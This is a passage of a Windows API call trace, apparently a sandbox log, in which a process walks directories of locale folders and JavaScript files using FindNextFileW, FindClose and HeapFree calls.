ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0176.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.674] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0176.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.676] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0176.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.678] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0176.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.678] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0176.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.679] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0176.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.679] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0176.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0176.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0176.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0176.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0176.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0176.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0176.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.686] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0176.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0176.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0176.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.688] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0176.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0176.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0176.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.691] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0176.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.692] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0176.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.693] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0176.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.693] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0176.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.694] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0176.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.695] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0176.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.695] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24931b8, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24931b8, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24931b8, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0176.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.699] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0176.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.700] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0176.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.700] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0176.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.701] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b9296, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24b9296, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24b9296, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0176.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.701] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0176.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.702] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0176.702] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0176.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.702] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x38d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0176.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.703] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rhp", cAlternateFileName="")) returned 0 [0176.703] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0176.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.704] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0176.704] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0176.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.704] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0176.704] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0176.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0176.706] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec6510c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec6510c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec6510c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="exportpdfupsell-app", cAlternateFileName="EXPORT~1")) returned 1 [0176.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.708] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec6510c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec6510c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec6510c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0176.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.767] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0176.767] FindClose (in: hFindFile=0x727708 | out: hFindFile=0x727708) returned 1 [0176.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.768] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: 